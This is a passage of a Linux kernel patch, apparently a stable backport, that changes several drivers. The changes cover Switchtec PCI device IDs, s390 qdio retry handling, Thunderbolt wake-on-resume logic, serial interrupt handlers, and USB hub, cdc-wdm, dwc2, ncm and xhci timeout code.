++	SWITCHTEC_PCI_DEVICE(0x5052, SWITCHTEC_GEN5),  /* PFX 52XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5036, SWITCHTEC_GEN5),  /* PFX 36XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5028, SWITCHTEC_GEN5),  /* PFX 28XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5100, SWITCHTEC_GEN5),  /* PSX 100XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5184, SWITCHTEC_GEN5),  /* PSX 84XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5168, SWITCHTEC_GEN5),  /* PSX 68XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5152, SWITCHTEC_GEN5),  /* PSX 52XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5136, SWITCHTEC_GEN5),  /* PSX 36XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5128, SWITCHTEC_GEN5),  /* PSX 28XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5200, SWITCHTEC_GEN5),  /* PAX 100XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5284, SWITCHTEC_GEN5),  /* PAX 84XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5268, SWITCHTEC_GEN5),  /* PAX 68XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5252, SWITCHTEC_GEN5),  /* PAX 52XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5236, SWITCHTEC_GEN5),  /* PAX 36XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5228, SWITCHTEC_GEN5),  /* PAX 28XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5300, SWITCHTEC_GEN5),  /* PFXA 100XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5384, SWITCHTEC_GEN5),  /* PFXA 84XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5368, SWITCHTEC_GEN5),  /* PFXA 68XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5352, SWITCHTEC_GEN5),  /* PFXA 52XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5336, SWITCHTEC_GEN5),  /* PFXA 36XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5328, SWITCHTEC_GEN5),  /* PFXA 28XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5400, SWITCHTEC_GEN5),  /* PSXA 100XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5484, SWITCHTEC_GEN5),  /* PSXA 84XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5468, SWITCHTEC_GEN5),  /* PSXA 68XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5452, SWITCHTEC_GEN5),  /* PSXA 52XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5436, SWITCHTEC_GEN5),  /* PSXA 36XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5428, SWITCHTEC_GEN5),  /* PSXA 28XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5500, SWITCHTEC_GEN5),  /* PAXA 100XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5584, SWITCHTEC_GEN5),  /* PAXA 84XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5568, SWITCHTEC_GEN5),  /* PAXA 68XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5552, SWITCHTEC_GEN5),  /* PAXA 52XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5536, SWITCHTEC_GEN5),  /* PAXA 36XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5528, SWITCHTEC_GEN5),  /* PAXA 28XG5 */
+ 	{0}
+ };
+ MODULE_DEVICE_TABLE(pci, switchtec_pci_tbl);
+diff --git a/drivers/s390/cio/device.c b/drivers/s390/cio/device.c
+index 02813b63f90fd..5666b9cc5d296 100644
+--- a/drivers/s390/cio/device.c
++++ b/drivers/s390/cio/device.c
+@@ -360,10 +360,8 @@ int ccw_device_set_online(struct ccw_device *cdev)
+ 
+ 	spin_lock_irq(cdev->ccwlock);
+ 	ret = ccw_device_online(cdev);
+-	spin_unlock_irq(cdev->ccwlock);
+-	if (ret == 0)
+-		wait_event(cdev->private->wait_q, dev_fsm_final_state(cdev));
+-	else {
++	if (ret) {
++		spin_unlock_irq(cdev->ccwlock);
+ 		CIO_MSG_EVENT(0, "ccw_device_online returned %d, "
+ 			      "device 0.%x.%04x\n",
+ 			      ret, cdev->private->dev_id.ssid,
+@@ -372,7 +370,12 @@ int ccw_device_set_online(struct ccw_device *cdev)
+ 		put_device(&cdev->dev);
+ 		return ret;
+ 	}
+-	spin_lock_irq(cdev->ccwlock);
++	/* Wait until a final state is reached */
++	while (!dev_fsm_final_state(cdev)) {
++		spin_unlock_irq(cdev->ccwlock);
++		wait_event(cdev->private->wait_q, dev_fsm_final_state(cdev));
++		spin_lock_irq(cdev->ccwlock);
++	}
+ 	/* Check if online processing was successful */
+ 	if ((cdev->private->state != DEV_STATE_ONLINE) &&
+ 	    (cdev->private->state != DEV_STATE_W4SENSE)) {
+diff --git a/drivers/s390/cio/qdio_main.c b/drivers/s390/cio/qdio_main.c
+index 9cde55730b65a..ebcb535809882 100644
+--- a/drivers/s390/cio/qdio_main.c
++++ b/drivers/s390/cio/qdio_main.c
+@@ -722,8 +722,8 @@ static void qdio_handle_activate_check(struct qdio_irq *irq_ptr,
+ 	lgr_info_log();
+ }
+ 
+-static void qdio_establish_handle_irq(struct qdio_irq *irq_ptr, int cstat,
+-				      int dstat)
++static int qdio_establish_handle_irq(struct qdio_irq *irq_ptr, int cstat,
++				     int dstat, int dcc)
+ {
+ 	DBF_DEV_EVENT(DBF_INFO, irq_ptr, "qest irq");
+ 
+@@ -731,15 +731,18 @@ static void qdio_establish_handle_irq(struct qdio_irq *irq_ptr, int cstat,
+ 		goto error;
+ 	if (dstat & ~(DEV_STAT_DEV_END | DEV_STAT_CHN_END))
+ 		goto error;
++	if (dcc == 1)
++		return -EAGAIN;
+ 	if (!(dstat & DEV_STAT_DEV_END))
+ 		goto error;
+ 	qdio_set_state(irq_ptr, QDIO_IRQ_STATE_ESTABLISHED);
+-	return;
++	return 0;
+ 
+ error:
+ 	DBF_ERROR("%4x EQ:error", irq_ptr->schid.sch_no);
+ 	DBF_ERROR("ds: %2x cs:%2x", dstat, cstat);
+ 	qdio_set_state(irq_ptr, QDIO_IRQ_STATE_ERR);
++	return -EIO;
+ }
+ 
+ /* qdio interrupt handler */
+@@ -748,7 +751,7 @@ void qdio_int_handler(struct ccw_device *cdev, unsigned long intparm,
+ {
+ 	struct qdio_irq *irq_ptr = cdev->private->qdio_data;
+ 	struct subchannel_id schid;
+-	int cstat, dstat;
++	int cstat, dstat, rc, dcc;
+ 
+ 	if (!intparm || !irq_ptr) {
+ 		ccw_device_get_schid(cdev, &schid);
+@@ -768,10 +771,12 @@ void qdio_int_handler(struct ccw_device *cdev, unsigned long intparm,
+ 	qdio_irq_check_sense(irq_ptr, irb);
+ 	cstat = irb->scsw.cmd.cstat;
+ 	dstat = irb->scsw.cmd.dstat;
++	dcc   = scsw_cmd_is_valid_cc(&irb->scsw) ? irb->scsw.cmd.cc : 0;
++	rc    = 0;
+ 
+ 	switch (irq_ptr->state) {
+ 	case QDIO_IRQ_STATE_INACTIVE:
+-		qdio_establish_handle_irq(irq_ptr, cstat, dstat);
++		rc = qdio_establish_handle_irq(irq_ptr, cstat, dstat, dcc);
+ 		break;
+ 	case QDIO_IRQ_STATE_CLEANUP:
+ 		qdio_set_state(irq_ptr, QDIO_IRQ_STATE_INACTIVE);
+@@ -785,12 +790,25 @@ void qdio_int_handler(struct ccw_device *cdev, unsigned long intparm,
+ 		if (cstat || dstat)
+ 			qdio_handle_activate_check(irq_ptr, intparm, cstat,
+ 						   dstat);
++		else if (dcc == 1)
++			rc = -EAGAIN;
+ 		break;
+ 	case QDIO_IRQ_STATE_STOPPED:
+ 		break;
+ 	default:
+ 		WARN_ON_ONCE(1);
+ 	}
++
++	if (rc == -EAGAIN) {
++		DBF_DEV_EVENT(DBF_INFO, irq_ptr, "qint retry");
++		rc = ccw_device_start(cdev, irq_ptr->ccw, intparm, 0, 0);
++		if (!rc)
++			return;
++		DBF_ERROR("%4x RETRY ERR", irq_ptr->schid.sch_no);
++		DBF_ERROR("rc:%4x", rc);
++		qdio_set_state(irq_ptr, QDIO_IRQ_STATE_ERR);
++	}
++
+ 	wake_up(&cdev->private->wait_q);
+ }
+ 
+diff --git a/drivers/thunderbolt/quirks.c b/drivers/thunderbolt/quirks.c
+index 638cb5fb22c11..e81de9c30eac9 100644
+--- a/drivers/thunderbolt/quirks.c
++++ b/drivers/thunderbolt/quirks.c
+@@ -10,6 +10,7 @@
+ static void quirk_force_power_link(struct tb_switch *sw)
+ {
+ 	sw->quirks |= QUIRK_FORCE_POWER_LINK_CONTROLLER;
++	tb_sw_dbg(sw, "forcing power to link controller\n");
+ }
+ 
+ static void quirk_dp_credit_allocation(struct tb_switch *sw)
+@@ -130,6 +131,7 @@ void tb_check_quirks(struct tb_switch *sw)
+ 		if (q->device && q->device != sw->device)
+ 			continue;
+ 
++		tb_sw_dbg(sw, "running %ps\n", q->hook);
+ 		q->hook(sw);
+ 	}
+ }
+diff --git a/drivers/thunderbolt/switch.c b/drivers/thunderbolt/switch.c
+index 55698a0978f03..d3058ede53064 100644
+--- a/drivers/thunderbolt/switch.c
++++ b/drivers/thunderbolt/switch.c
+@@ -2880,22 +2880,29 @@ void tb_switch_unconfigure_link(struct tb_switch *sw)
+ {
+ 	struct tb_port *up, *down;
+ 
+-	if (sw->is_unplugged)
+-		return;
+ 	if (!tb_route(sw) || tb_switch_is_icm(sw))
+ 		return;
+ 
++	/*
++	 * Unconfigure downstream port so that wake-on-connect can be
++	 * configured after router unplug. No need to unconfigure upstream port
++	 * since its router is unplugged.
++	 */
+ 	up = tb_upstream_port(sw);
+-	if (tb_switch_is_usb4(up->sw))
+-		usb4_port_unconfigure(up);
+-	else
+-		tb_lc_unconfigure_port(up);
+-
+ 	down = up->remote;
+ 	if (tb_switch_is_usb4(down->sw))
+ 		usb4_port_unconfigure(down);
+ 	else
+ 		tb_lc_unconfigure_port(down);
++
++	if (sw->is_unplugged)
++		return;
++
++	up = tb_upstream_port(sw);
++	if (tb_switch_is_usb4(up->sw))
++		usb4_port_unconfigure(up);
++	else
++		tb_lc_unconfigure_port(up);
+ }
+ 
+ static void tb_switch_credits_init(struct tb_switch *sw)
+@@ -3135,7 +3142,26 @@ static int tb_switch_set_wake(struct tb_switch *sw, unsigned int flags)
+ 	return tb_lc_set_wake(sw, flags);
+ }
+ 
+-int tb_switch_resume(struct tb_switch *sw)
++static void tb_switch_check_wakes(struct tb_switch *sw)
++{
++	if (device_may_wakeup(&sw->dev)) {
++		if (tb_switch_is_usb4(sw))
++			usb4_switch_check_wakes(sw);
++	}
++}
++
++/**
++ * tb_switch_resume() - Resume a switch after sleep
++ * @sw: Switch to resume
++ * @runtime: Is this resume from runtime suspend or system sleep
++ *
++ * Resumes and re-enumerates router (and all its children), if still plugged
++ * after suspend. Don't enumerate device router whose UID was changed during
++ * suspend. If this is resume from system sleep, notifies PM core about the
++ * wakes occurred during suspend. Disables all wakes, except USB4 wake of
++ * upstream port for USB4 routers that shall be always enabled.
++ */
++int tb_switch_resume(struct tb_switch *sw, bool runtime)
+ {
+ 	struct tb_port *port;
+ 	int err;
+@@ -3184,6 +3210,9 @@ int tb_switch_resume(struct tb_switch *sw)
+ 	if (err)
+ 		return err;
+ 
++	if (!runtime)
++		tb_switch_check_wakes(sw);
++
+ 	/* Disable wakes */
+ 	tb_switch_set_wake(sw, 0);
+ 
+@@ -3213,7 +3242,8 @@ int tb_switch_resume(struct tb_switch *sw)
+ 			 */
+ 			if (tb_port_unlock(port))
+ 				tb_port_warn(port, "failed to unlock port\n");
+-			if (port->remote && tb_switch_resume(port->remote->sw)) {
++			if (port->remote &&
++			    tb_switch_resume(port->remote->sw, runtime)) {
+ 				tb_port_warn(port,
+ 					     "lost during suspend, disconnecting\n");
+ 				tb_sw_set_unplugged(port->remote->sw);
+diff --git a/drivers/thunderbolt/tb.c b/drivers/thunderbolt/tb.c
+index e83269dc2b067..c5e4fa478e643 100644
+--- a/drivers/thunderbolt/tb.c
++++ b/drivers/thunderbolt/tb.c
+@@ -1628,7 +1628,7 @@ static int tb_resume_noirq(struct tb *tb)
+ 	/* remove any pci devices the firmware might have setup */
+ 	tb_switch_reset(tb->root_switch);
+ 
+-	tb_switch_resume(tb->root_switch);
++	tb_switch_resume(tb->root_switch, false);
+ 	tb_free_invalid_tunnels(tb);
+ 	tb_free_unplugged_children(tb->root_switch);
+ 	tb_restore_children(tb->root_switch);
+@@ -1754,7 +1754,7 @@ static int tb_runtime_resume(struct tb *tb)
+ 	struct tb_tunnel *tunnel, *n;
+ 
+ 	mutex_lock(&tb->lock);
+-	tb_switch_resume(tb->root_switch);
++	tb_switch_resume(tb->root_switch, true);
+ 	tb_free_invalid_tunnels(tb);
+ 	tb_restore_children(tb->root_switch);
+ 	list_for_each_entry_safe(tunnel, n, &tcm->tunnel_list, list)
+diff --git a/drivers/thunderbolt/tb.h b/drivers/thunderbolt/tb.h
+index b3fec5f8e20cd..acf5b86208455 100644
+--- a/drivers/thunderbolt/tb.h
++++ b/drivers/thunderbolt/tb.h
+@@ -787,7 +787,7 @@ int tb_switch_configure(struct tb_switch *sw);
+ int tb_switch_add(struct tb_switch *sw);
+ void tb_switch_remove(struct tb_switch *sw);
+ void tb_switch_suspend(struct tb_switch *sw, bool runtime);
+-int tb_switch_resume(struct tb_switch *sw);
++int tb_switch_resume(struct tb_switch *sw, bool runtime);
+ int tb_switch_reset(struct tb_switch *sw);
+ int tb_switch_wait_for_bit(struct tb_switch *sw, u32 offset, u32 bit,
+ 			   u32 value, int timeout_msec);
+@@ -1182,6 +1182,7 @@ static inline struct tb_retimer *tb_to_retimer(struct device *dev)
+ 	return NULL;
+ }
+ 
++void usb4_switch_check_wakes(struct tb_switch *sw);
+ int usb4_switch_setup(struct tb_switch *sw);
+ int usb4_switch_read_uid(struct tb_switch *sw, u64 *uid);
+ int usb4_switch_drom_read(struct tb_switch *sw, unsigned int address, void *buf,
+diff --git a/drivers/thunderbolt/usb4.c b/drivers/thunderbolt/usb4.c
+index 3c821f5e44814..b0394ba6d111d 100644
+--- a/drivers/thunderbolt/usb4.c
++++ b/drivers/thunderbolt/usb4.c
+@@ -153,15 +153,18 @@ static inline int usb4_switch_op_data(struct tb_switch *sw, u16 opcode,
+ 				tx_dwords, rx_data, rx_dwords);
+ }
+ 
+-static void usb4_switch_check_wakes(struct tb_switch *sw)
++/**
++ * usb4_switch_check_wakes() - Check for wakes and notify PM core about them
++ * @sw: Router whose wakes to check
++ *
++ * Checks wakes occurred during suspend and notify the PM core about them.
++ */
++void usb4_switch_check_wakes(struct tb_switch *sw)
+ {
+ 	struct tb_port *port;
+ 	bool wakeup = false;
+ 	u32 val;
+ 
+-	if (!device_may_wakeup(&sw->dev))
+-		return;
+-
+ 	if (tb_route(sw)) {
+ 		if (tb_sw_read(sw, &val, TB_CFG_SWITCH, ROUTER_CS_6, 1))
+ 			return;
+@@ -226,8 +229,6 @@ int usb4_switch_setup(struct tb_switch *sw)
+ 	u32 val = 0;
+ 	int ret;
+ 
+-	usb4_switch_check_wakes(sw);
+-
+ 	if (!tb_route(sw))
+ 		return 0;
+ 
+diff --git a/drivers/tty/serial/mxs-auart.c b/drivers/tty/serial/mxs-auart.c
+index d21a4f3ef2fe6..8b31017e7e563 100644
+--- a/drivers/tty/serial/mxs-auart.c
++++ b/drivers/tty/serial/mxs-auart.c
+@@ -1094,11 +1094,13 @@ static void mxs_auart_set_ldisc(struct uart_port *port,
+ 
+ static irqreturn_t mxs_auart_irq_handle(int irq, void *context)
+ {
+-	u32 istat;
++	u32 istat, stat;
+ 	struct mxs_auart_port *s = context;
+ 	u32 mctrl_temp = s->mctrl_prev;
+-	u32 stat = mxs_read(s, REG_STAT);
+ 
++	uart_port_lock(&s->port);
++
++	stat = mxs_read(s, REG_STAT);
+ 	istat = mxs_read(s, REG_INTR);
+ 
+ 	/* ack irq */
+@@ -1134,6 +1136,8 @@ static irqreturn_t mxs_auart_irq_handle(int irq, void *context)
+ 		istat &= ~AUART_INTR_TXIS;
+ 	}
+ 
++	uart_port_unlock(&s->port);
++
+ 	return IRQ_HANDLED;
+ }
+ 
+diff --git a/drivers/tty/serial/pmac_zilog.c b/drivers/tty/serial/pmac_zilog.c
+index fe2e4ec423f79..daf15d23bb42e 100644
+--- a/drivers/tty/serial/pmac_zilog.c
++++ b/drivers/tty/serial/pmac_zilog.c
+@@ -210,7 +210,6 @@ static bool pmz_receive_chars(struct uart_pmac_port *uap)
+ {
+ 	struct tty_port *port;
+ 	unsigned char ch, r1, drop, flag;
+-	int loops = 0;
+ 
+ 	/* Sanity check, make sure the old bug is no longer happening */
+ 	if (uap->port.state == NULL) {
+@@ -291,24 +290,11 @@ static bool pmz_receive_chars(struct uart_pmac_port *uap)
+ 		if (r1 & Rx_OVR)
+ 			tty_insert_flip_char(port, 0, TTY_OVERRUN);
+ 	next_char:
+-		/* We can get stuck in an infinite loop getting char 0 when the
+-		 * line is in a wrong HW state, we break that here.
+-		 * When that happens, I disable the receive side of the driver.
+-		 * Note that what I've been experiencing is a real irq loop where
+-		 * I'm getting flooded regardless of the actual port speed.
+-		 * Something strange is going on with the HW
+-		 */
+-		if ((++loops) > 1000)
+-			goto flood;
+ 		ch = read_zsreg(uap, R0);
+ 		if (!(ch & Rx_CH_AV))
+ 			break;
+ 	}
+ 
+-	return true;
+- flood:
+-	pmz_interrupt_control(uap, 0);
+-	pmz_error("pmz: rx irq flood !\n");
+ 	return true;
+ }
+ 
+diff --git a/drivers/tty/serial/stm32-usart.c b/drivers/tty/serial/stm32-usart.c
+index 2a9c4058824a8..7d11511c8c12a 100644
+--- a/drivers/tty/serial/stm32-usart.c
++++ b/drivers/tty/serial/stm32-usart.c
+@@ -755,6 +755,7 @@ static irqreturn_t stm32_usart_interrupt(int irq, void *ptr)
+ 	const struct stm32_usart_offsets *ofs = &stm32_port->info->ofs;
+ 	u32 sr;
+ 	unsigned int size;
++	irqreturn_t ret = IRQ_NONE;
+ 
+ 	sr = readl_relaxed(port->membase + ofs->isr);
+ 
+@@ -763,11 +764,14 @@ static irqreturn_t stm32_usart_interrupt(int irq, void *ptr)
+ 	    (sr & USART_SR_TC)) {
+ 		stm32_usart_tc_interrupt_disable(port);
+ 		stm32_usart_rs485_rts_disable(port);
++		ret = IRQ_HANDLED;
+ 	}
+ 
+-	if ((sr & USART_SR_RTOF) && ofs->icr != UNDEF_REG)
++	if ((sr & USART_SR_RTOF) && ofs->icr != UNDEF_REG) {
+ 		writel_relaxed(USART_ICR_RTOCF,
+ 			       port->membase + ofs->icr);
++		ret = IRQ_HANDLED;
++	}
+ 
+ 	if ((sr & USART_SR_WUF) && ofs->icr != UNDEF_REG) {
+ 		/* Clear wake up flag and disable wake up interrupt */
+@@ -776,6 +780,7 @@ static irqreturn_t stm32_usart_interrupt(int irq, void *ptr)
+ 		stm32_usart_clr_bits(port, ofs->cr3, USART_CR3_WUFIE);
+ 		if (irqd_is_wakeup_set(irq_get_irq_data(port->irq)))
+ 			pm_wakeup_event(tport->tty->dev, 0);
++		ret = IRQ_HANDLED;
+ 	}
+ 
+ 	/*
+@@ -790,6 +795,7 @@ static irqreturn_t stm32_usart_interrupt(int irq, void *ptr)
+ 			uart_unlock_and_check_sysrq(port);
+ 			if (size)
+ 				tty_flip_buffer_push(tport);
++			ret = IRQ_HANDLED;
+ 		}
+ 	}
+ 
+@@ -797,6 +803,7 @@ static irqreturn_t stm32_usart_interrupt(int irq, void *ptr)
+ 		spin_lock(&port->lock);
+ 		stm32_usart_transmit_chars(port);
+ 		spin_unlock(&port->lock);
++		ret = IRQ_HANDLED;
+ 	}
+ 
+ 	/* Receiver timeout irq for DMA RX */
+@@ -806,9 +813,10 @@ static irqreturn_t stm32_usart_interrupt(int irq, void *ptr)
+ 		uart_unlock_and_check_sysrq(port);
+ 		if (size)
+ 			tty_flip_buffer_push(tport);
++		ret = IRQ_HANDLED;
+ 	}
+ 
+-	return IRQ_HANDLED;
++	return ret;
+ }
+ 
+ static void stm32_usart_set_mctrl(struct uart_port *port, unsigned int mctrl)
+@@ -1013,6 +1021,7 @@ static int stm32_usart_startup(struct uart_port *port)
+ 		val |= USART_CR2_SWAP;
+ 		writel_relaxed(val, port->membase + ofs->cr2);
+ 	}
++	stm32_port->throttled = false;
+ 
+ 	/* RX FIFO Flush */
+ 	if (ofs->rqr != UNDEF_REG)
+diff --git a/drivers/usb/class/cdc-wdm.c b/drivers/usb/class/cdc-wdm.c
+index fdc1a66b129a4..1f0951be15ab7 100644
+--- a/drivers/usb/class/cdc-wdm.c
++++ b/drivers/usb/class/cdc-wdm.c
+@@ -485,7 +485,6 @@ static ssize_t wdm_write
+ static int service_outstanding_interrupt(struct wdm_device *desc)
+ {
+ 	int rv = 0;
+-	int used;
+ 
+ 	/* submit read urb only if the device is waiting for it */
+ 	if (!desc->resp_count || !--desc->resp_count)
+@@ -500,10 +499,7 @@ static int service_outstanding_interrupt(struct wdm_device *desc)
+ 		goto out;
+ 	}
+ 
+-	used = test_and_set_bit(WDM_RESPONDING, &desc->flags);
+-	if (used)
+-		goto out;
+-
++	set_bit(WDM_RESPONDING, &desc->flags);
+ 	spin_unlock_irq(&desc->iuspin);
+ 	rv = usb_submit_urb(desc->response, GFP_KERNEL);
+ 	spin_lock_irq(&desc->iuspin);
+diff --git a/drivers/usb/core/hub.c b/drivers/usb/core/hub.c
+index b1fb04e5247c3..dea110241ee71 100644
+--- a/drivers/usb/core/hub.c
++++ b/drivers/usb/core/hub.c
+@@ -60,6 +60,12 @@
+ #define USB_PING_RESPONSE_TIME		400	/* ns */
+ #define USB_REDUCE_FRAME_INTR_BINTERVAL	9
+ 
++/*
++ * The SET_ADDRESS request timeout will be 500 ms when
++ * USB_QUIRK_SHORT_SET_ADDRESS_REQ_TIMEOUT quirk flag is set.
++ */
++#define USB_SHORT_SET_ADDRESS_REQ_TIMEOUT	500  /* ms */
++
+ /* Protect struct usb_device->state and ->children members
+  * Note: Both are also protected by ->dev.sem, except that ->state can
+  * change to USB_STATE_NOTATTACHED even when the semaphore isn't held. */
+@@ -4648,7 +4654,12 @@ EXPORT_SYMBOL_GPL(usb_ep0_reinit);
+ static int hub_set_address(struct usb_device *udev, int devnum)
+ {
+ 	int retval;
++	unsigned int timeout_ms = USB_CTRL_SET_TIMEOUT;
+ 	struct usb_hcd *hcd = bus_to_hcd(udev->bus);
++	struct usb_hub *hub = usb_hub_to_struct_hub(udev->parent);
++
++	if (hub->hdev->quirks & USB_QUIRK_SHORT_SET_ADDRESS_REQ_TIMEOUT)
++		timeout_ms = USB_SHORT_SET_ADDRESS_REQ_TIMEOUT;
+ 
+ 	/*
+ 	 * The host controller will choose the device address,
+@@ -4661,11 +4672,11 @@ static int hub_set_address(struct usb_device *udev, int devnum)
+ 	if (udev->state != USB_STATE_DEFAULT)
+ 		return -EINVAL;
+ 	if (hcd->driver->address_device)
+-		retval = hcd->driver->address_device(hcd, udev);
++		retval = hcd->driver->address_device(hcd, udev, timeout_ms);
+ 	else
+ 		retval = usb_control_msg(udev, usb_sndaddr0pipe(),
+ 				USB_REQ_SET_ADDRESS, 0, devnum, 0,
+-				NULL, 0, USB_CTRL_SET_TIMEOUT);
++				NULL, 0, timeout_ms);
+ 	if (retval == 0) {
+ 		update_devnum(udev, devnum);
+ 		/* Device now using proper address. */
+diff --git a/drivers/usb/core/port.c b/drivers/usb/core/port.c
+index e91fa567d08d2..93a63b7f164d1 100644
+--- a/drivers/usb/core/port.c
++++ b/drivers/usb/core/port.c
+@@ -409,8 +409,10 @@ static void usb_port_shutdown(struct device *dev)
+ {
+ 	struct usb_port *port_dev = to_usb_port(dev);
+ 
+-	if (port_dev->child)
++	if (port_dev->child) {
+ 		usb_disable_usb2_hardware_lpm(port_dev->child);
++		usb_unlocked_disable_lpm(port_dev->child);
++	}
+ }
+ 
+ static const struct dev_pm_ops usb_port_pm_ops = {
+diff --git a/drivers/usb/core/quirks.c b/drivers/usb/core/quirks.c
+index 15e9bd180a1d2..b4783574b8e66 100644
+--- a/drivers/usb/core/quirks.c
++++ b/drivers/usb/core/quirks.c
+@@ -138,6 +138,9 @@ static int quirks_param_set(const char *value, const struct kernel_param *kp)
+ 			case 'o':
+ 				flags |= USB_QUIRK_HUB_SLOW_RESET;
+ 				break;
++			case 'p':
++				flags |= USB_QUIRK_SHORT_SET_ADDRESS_REQ_TIMEOUT;
++				break;
+ 			/* Ignore unrecognized flag characters */
+ 			}
+ 		}
+@@ -527,6 +530,10 @@ static const struct usb_device_id usb_quirk_list[] = {
+ 
+ 	{ USB_DEVICE(0x2386, 0x350e), .driver_info = USB_QUIRK_NO_LPM },
+ 
++	/* APTIV AUTOMOTIVE HUB */
++	{ USB_DEVICE(0x2c48, 0x0132), .driver_info =
++			USB_QUIRK_SHORT_SET_ADDRESS_REQ_TIMEOUT },
++
+ 	/* DJI CineSSD */
+ 	{ USB_DEVICE(0x2ca3, 0x0031), .driver_info = USB_QUIRK_NO_LPM },
+ 
+diff --git a/drivers/usb/dwc2/hcd_ddma.c b/drivers/usb/dwc2/hcd_ddma.c
+index 79582b102c7ed..994a78ad084b1 100644
+--- a/drivers/usb/dwc2/hcd_ddma.c
++++ b/drivers/usb/dwc2/hcd_ddma.c
+@@ -867,13 +867,15 @@ static int dwc2_cmpl_host_isoc_dma_desc(struct dwc2_hsotg *hsotg,
+ 	struct dwc2_dma_desc *dma_desc;
+ 	struct dwc2_hcd_iso_packet_desc *frame_desc;
+ 	u16 frame_desc_idx;
+-	struct urb *usb_urb = qtd->urb->priv;
++	struct urb *usb_urb;
+ 	u16 remain = 0;
+ 	int rc = 0;
+ 
+ 	if (!qtd->urb)
+ 		return -EINVAL;
+ 
++	usb_urb = qtd->urb->priv;
++
+ 	dma_sync_single_for_cpu(hsotg->dev, qh->desc_list_dma + (idx *
+ 				sizeof(struct dwc2_dma_desc)),
+ 				sizeof(struct dwc2_dma_desc),
+diff --git a/drivers/usb/gadget/function/f_ncm.c b/drivers/usb/gadget/function/f_ncm.c
+index 14601a2d25427..b267ed9dc6d99 100644
+--- a/drivers/usb/gadget/function/f_ncm.c
++++ b/drivers/usb/gadget/function/f_ncm.c
+@@ -884,7 +884,7 @@ static int ncm_set_alt(struct usb_function *f, unsigned intf, unsigned alt)
+ 		if (alt > 1)
+ 			goto fail;
+ 
+-		if (ncm->port.in_ep->enabled) {
++		if (ncm->netdev) {
+ 			DBG(cdev, "reset ncm\n");
+ 			ncm->netdev = NULL;
+ 			gether_disconnect(&ncm->port);
+@@ -1369,7 +1369,7 @@ static void ncm_disable(struct usb_function *f)
+ 
+ 	DBG(cdev, "ncm deactivated\n");
+ 
+-	if (ncm->port.in_ep->enabled) {
++	if (ncm->netdev) {
+ 		ncm->netdev = NULL;
+ 		gether_disconnect(&ncm->port);
+ 	}
+diff --git a/drivers/usb/host/pci-quirks.c b/drivers/usb/host/pci-quirks.c
+index ef08d68b97149..2665832f9addf 100644
+--- a/drivers/usb/host/pci-quirks.c
++++ b/drivers/usb/host/pci-quirks.c
+@@ -207,8 +207,7 @@ EXPORT_SYMBOL_GPL(sb800_prefetch);
+ static void usb_amd_find_chipset_info(void)
+ {
+ 	unsigned long flags;
+-	struct amd_chipset_info info;
+-	info.need_pll_quirk = false;
++	struct amd_chipset_info info = { };
+ 
+ 	spin_lock_irqsave(&amd_lock, flags);
+ 
+@@ -218,7 +217,6 @@ static void usb_amd_find_chipset_info(void)
+ 		spin_unlock_irqrestore(&amd_lock, flags);
+ 		return;
+ 	}
+-	memset(&info, 0, sizeof(info));
+ 	spin_unlock_irqrestore(&amd_lock, flags);
+ 
+ 	if (!amd_chipset_sb_type_init(&info)) {
+diff --git a/drivers/usb/host/xhci-mem.c b/drivers/usb/host/xhci-mem.c
+index 019dcbe55dbdc..62808c98713ec 100644
+--- a/drivers/usb/host/xhci-mem.c
++++ b/drivers/usb/host/xhci-mem.c
+@@ -1752,6 +1752,8 @@ struct xhci_command *xhci_alloc_command(struct xhci_hcd *xhci,
+ 	}
+ 
+ 	command->status = 0;
++	/* set default timeout to 5000 ms */
++	command->timeout_ms = XHCI_CMD_DEFAULT_TIMEOUT;
+ 	INIT_LIST_HEAD(&command->cmd_list);
+ 	return command;
+ }
+diff --git a/drivers/usb/host/xhci-ring.c b/drivers/usb/host/xhci-ring.c
+index 239b5edee3268..4a039e42694bc 100644
+--- a/drivers/usb/host/xhci-ring.c
++++ b/drivers/usb/host/xhci-ring.c
+@@ -332,9 +332,10 @@ void xhci_ring_cmd_db(struct xhci_hcd *xhci)
+ 	readl(&xhci->dba->doorbell[0]);
+ }
+ 
+-static bool xhci_mod_cmd_timer(struct xhci_hcd *xhci, unsigned long delay)
++static bool xhci_mod_cmd_timer(struct xhci_hcd *xhci)
+ {
+-	return mod_delayed_work(system_wq, &xhci->cmd_timer, delay);
++	return mod_delayed_work(system_wq, &xhci->cmd_timer,
++			msecs_to_jiffies(xhci->current_cmd->timeout_ms));
+ }
+ 
+ static struct xhci_command *xhci_next_queued_cmd(struct xhci_hcd *xhci)
+@@ -378,7 +379,7 @@ static void xhci_handle_stopped_cmd_ring(struct xhci_hcd *xhci,
+ 	if ((xhci->cmd_ring->dequeue != xhci->cmd_ring->enqueue) &&
+ 	    !(xhci->xhc_state & XHCI_STATE_DYING)) {
+ 		xhci->current_cmd = cur_cmd;
+-		xhci_mod_cmd_timer(xhci, XHCI_CMD_DEFAULT_TIMEOUT);
